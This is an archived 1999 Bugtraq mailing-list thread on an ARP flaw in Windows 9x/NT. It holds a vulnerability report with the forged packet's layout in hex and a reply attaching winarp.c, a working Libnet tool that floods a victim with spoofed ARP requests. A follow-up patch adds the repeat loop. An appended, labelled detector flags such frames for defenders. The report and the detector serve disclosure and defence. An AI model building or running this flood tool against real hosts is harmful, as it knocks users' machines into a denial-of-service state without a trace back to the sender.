Internet Message Format | 1999-04-16 | 7KB
Date: Tue, 13 Apr 1999 11:23:29 +0300
From: kay <kay@PHREEDOM.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: ARP problem in Windows9X/NT
Parts/Attachments:
1 Shown 71 lines Text
2 OK ~3.3 KB Text, ""
----------------------------------------
Hya,
Could you be more specific with those XX-fields ?
I started writing that proggie with plain syscalls, but it would only run
on Linux, so I modified one of the examples in Route's Libnet 0.9 to do
the stuff. I haven't tested it yet since I don't have a LAN at home...
Compile with:
cc winarp.c -o winarp -lnet
Usage:
./winarp [-i device] [-c count] -d destination
For those who are still wondering what the hell Libnet is: check out
http://www.infonexus.com/~demon9
--
kay@phreedom.org
AD80 0D6A 5286 2729 5D2F 6326 D3F8 C61A 93F4 4C48 xuniL
DA FA 10 7D 6A 05 45 11 37 E1 E1 2B B4 34 2E 83 Zelur
On Mon, 12 Apr 1999, Joel Jacobson wrote:
> Hello all bugtraqers!
>
> I've found a problem in Windows9X/NT's way of handling ARP packets.
>
> If you flood a computer on your LAN with the packet below, its user
> will be forced to click a messagebox's OK button x times, where x is the number
> of packets you flooded with.
>
> I advise Microsoft to develop a patch for this problem that lets you
> choose to ignore all future messages of this type.
>
> There is no way to trace the flooder since the MAC address in the
> packet can be modified to anything. Badly configured routers will
> not drop this packet. When I tested this problem on my LAN I could
> flood a computer on another C-net at my LAN without problems.
>
> The program NetXRay was used to perform the flood.
> The victims had to reboot their computer, or choose to click _very_
> many OK buttons.
>
> The ARP packet is built up like this:
>
> Ethernet Version II:
> Address: XX-XX-XX-XX-XX-XX --->FF-FF-FF-FF-FF-FF
> Ethernet II Protocol Type: ARP
> Address Resolution Protocol:
> Hardware Type: 1 (Ethernet)
> Protocol Type: 800
> Hardware Address: Length: 6
> Protocol Address: Length: 4
> Operations: ARP Request
> Source Hardware Address: XX-XX-XX-XX-XX-XX
> IP Source Address: <victim computer's IP>
> Destination Hardware Address: XX-XX-XX-XX-XX-XX
> IP Destination Address: <victim computer's IP>
>
> And in HEX the packet looks like this:
> ff ff ff ff ff ff 00 00 00 00 00 00 08 06 08 00 06 04 00 01 00 00 00
> 00 00 00 XX XX XX XX 00 00 00 00 00 00 XX XX XX XX
> (XX is what matters here)
>
> Hope a patch for this problem will be developed fast, cause this is a
> big problem for my school and probably also to others.
>
> I'm not a C programmer, and don't know how to write an exploit for
> this problem. So, if anyone else can develop an exploit, feel free to do so.
>
> Joel Jacobson.
[ Part 2, "" Text/PLAIN (Name: "winarp.c") 71 lines. ]
/*
* Copyright (c) 1998, 1999 route|daemon9 <route@infonexus.com>
* All rights reserved.
*
* Modified to winarps.c 1999 by kay <kay@phreedom.org>
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#include <libnet.h>

u_char enet_src[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
u_long ip_dst = 0;

void send_arp(struct link_int *, u_char *);

#if (__linux__)
#define IPOPT_SECURITY 130
#endif

int main(int argc, char *argv[])
{
    int c, count = 1;
    char errbuf[256];
    char *device = NULL;
    char *address = NULL;
    struct link_int *l;

    while ((c = getopt(argc, argv, "i:d:c:")) != EOF) {
        switch (c) {
        case 'i':
            device = optarg;
            break;
        case 'd':
            address = optarg;
            ip_dst = name_resolve(address, 0);
            break;
        case 'c':
            count = atoi(optarg);
            break;
        default:
            exit(EXIT_FAILURE);
        }
    }
    if (!device) {
        fprintf(stderr, "Specify a device\n");
        exit(EXIT_FAILURE);
    }
    if (!ip_dst) {
        fprintf(stderr, "Specify destination\n");
        exit(EXIT_FAILURE);
    }
    if ((l = open_link_interface(device, errbuf)) == NULL) {
        fprintf(stderr, "open_link_interface: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }
    send_arp(l, device);
    exit(EXIT_SUCCESS);
}

void send_arp(struct link_int *l, u_char * device)
{
    int n;
    u_char *buf;

    buf = (u_char *) malloc(ARP_H + ETH_H);
    if (!buf) {
        perror("no packet memory");
        exit(EXIT_FAILURE);
    }
    memset(buf, 0, ARP_H + ETH_H);
    build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);
    build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REQUEST, enet_src,
              (void *)&ip_dst, enet_dst, (void *)&ip_dst, NULL, 0, buf + ETH_H);
    n = write_link_layer(l, device, buf, ARP_H + ETH_H);
    printf("Wrote %d byte ARP packet through linktype %d\n", n, l->linktype);
}
-----------------------------------------------------------------------------------
Date: Tue, 13 Apr 1999 12:13:17 +0300
From: kay <kay@PHREEDOM.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: ARP problem in Windows9X/NT
Forgot something:
In winarp.c
77 exit(EXIT_FAILURE);
78 }
+++ 79 for ( ; count <= 0; count--)
80 send_arp(l, device);
81 exit(EXIT_SUCCESS);
--
kay@phreedom.org
AD80 0D6A 5286 2729 5D2F 6326 D3F8 C61A 93F4 4C48 xuniL
DA FA 10 7D 6A 05 45 11 37 E1 E1 2B B4 34 2E 83 Zelur
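
Seen from the monitoring side, the frame described in the thread is an ARP message whose sender and target IP are both the victim's address while the sender hardware address is not the victim's. The following detector is an added example, not part of the original posts or of winarp.c; the function names, the watched address 192.0.2.10, its MAC and the sample frames are all constructed for illustration, and untagged Ethernet II framing is assumed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Byte offsets in an untagged Ethernet II frame carrying IPv4 ARP (RFC 826). */
enum { ETH_TYPE = 12, ARP_HDR = 14, ARP_SHA = 22, ARP_SPA = 28, ARP_TPA = 38, ARP_LEN = 42 };
enum verdict { NOT_ARP, BENIGN, FORGED_CONFLICT };

/* Flags a frame claiming ip (sender IP == target IP) from a MAC other than the recorded one. */
enum verdict check_frame(const uint8_t *f, size_t len,
                         const uint8_t ip[4], const uint8_t mac[6])
{
    static const uint8_t fixed[] = {0x00, 0x01, 0x08, 0x00, 6, 4}; /* htype, ptype, hlen, plen */
    if (len < ARP_LEN || f[ETH_TYPE] != 0x08 || f[ETH_TYPE + 1] != 0x06 ||
        memcmp(f + ARP_HDR, fixed, sizeof fixed) != 0)
        return NOT_ARP;                       /* truncated or not IPv4-over-Ethernet ARP */
    if (memcmp(f + ARP_SPA, f + ARP_TPA, 4) != 0 || memcmp(f + ARP_SPA, ip, 4) != 0)
        return BENIGN;                        /* ordinary lookup, or another host's address */
    return memcmp(f + ARP_SHA, mac, 6) == 0 ? BENIGN : FORGED_CONFLICT;
}

/* Constructed sample data: 192.0.2.10 is the watched host, 02:00:00:00:00:0a its NIC. */
static const uint8_t WATCHED_IP[4] = {192, 0, 2, 10};
static const uint8_t OWNER_MAC[6] = {0x02, 0, 0, 0, 0, 0x0a};
static const uint8_t SAMPLES[3][ARP_LEN] = {
    /* frame shaped like the report: zeroed sender MAC, both IPs set to the watched host */
    {0xff,0xff,0xff,0xff,0xff,0xff, 0,0,0,0,0,0, 0x08,0x06, 0,1, 8,0, 6,4, 0,1,
     0,0,0,0,0,0, 192,0,2,10, 0,0,0,0,0,0, 192,0,2,10},
    /* the owner's own gratuitous ARP */
    {0xff,0xff,0xff,0xff,0xff,0xff, 2,0,0,0,0,0x0a, 0x08,0x06, 0,1, 8,0, 6,4, 0,1,
     2,0,0,0,0,0x0a, 192,0,2,10, 0,0,0,0,0,0, 192,0,2,10},
    /* ordinary request: 192.0.2.20 asking for 192.0.2.10 */
    {0xff,0xff,0xff,0xff,0xff,0xff, 2,0,0,0,0,0x14, 0x08,0x06, 0,1, 8,0, 6,4, 0,1,
     2,0,0,0,0,0x14, 192,0,2,20, 0,0,0,0,0,0, 192,0,2,10},
};

/* Counts forged-conflict frames in a capture; a monitor would alert on any non-zero count. */
int count_forged(const uint8_t frames[][ARP_LEN], size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += check_frame(frames[i], ARP_LEN, WATCHED_IP, OWNER_MAC) == FORGED_CONFLICT;
    return hits;
}

int main(void)
{
    printf("forged conflict frames: %d\n", count_forged(SAMPLES, 3));
    return 0;
}
```

Because the sender MAC in such a frame is arbitrary, the verdict identifies the forged claim but not the sending station; the switch port on which the frame arrived is the usable trace.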